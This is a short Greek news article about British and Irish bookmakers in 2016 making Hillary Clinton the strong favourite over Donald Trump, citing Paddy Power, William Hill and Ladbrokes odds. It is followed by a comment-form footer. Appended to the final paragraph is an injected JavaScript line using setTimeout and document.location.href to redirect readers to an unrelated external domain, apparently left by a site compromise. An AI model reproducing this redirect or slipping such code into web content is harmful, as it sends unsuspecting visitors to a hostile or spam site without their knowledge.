Φαβορί η Χίλαρι σύμφωνα με τα βρετανικά πρακτορεία στοιχημάτων

0
6

 

Τα γραφεία στοιχημάτων στη Βρετανία και την Ιρλανδία ανέδειξαν τη Χίλαρι Κλίντον ως το μεγάλο φαβορί στην κούρσα της προεδρικής διαδοχής έναντι του Ντόναλντ Τραμπ.

Το ιρλανδικό Paddy Power δίνει στην υποψήφια των Δημοκρατικών ποσοστό νίκης 85,7% έναντι 18,2% για τον μεγιστάνα από τη Νέα Υόρκη, ενώ οι πιθανότητες που δίνουν τα γραφεία στοιχημάτων William Hill και Ladbrokes στη Χίλαρι να επικρατήσει είναι 85,7% και 84,6% αντίστοιχα έναντι 20% του Ντόναλντ Τραμπ.

Σύμφωνα με το Paddy Power, οι κατηγορίες που διατυπώθηκαν εναντίον του δισεκατομμυριούχου – ιδιαίτερα οι καταγγελίες για προσβλητική συμπεριφορά εναντίον γυναικών – είχαν ως αποτέλεσμα την αύξηση των ποσοστών της Κλίντον.

Σε περίπτωση που διαψευσθούν τα πρακτορεία στοιχημάτων και κερδίσει ο Ρεπουμπλικανός υποψήφιος, τότε οι Ιρλανδοί μπουκμέικερ θα κληθούν να πληρώσουν στους πελάτες τους που στοιχημάτισαν υπέρ του Τραμπ «το υψηλότερο ποσό χρημάτων στην ιστορία των στοιχημάτων». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here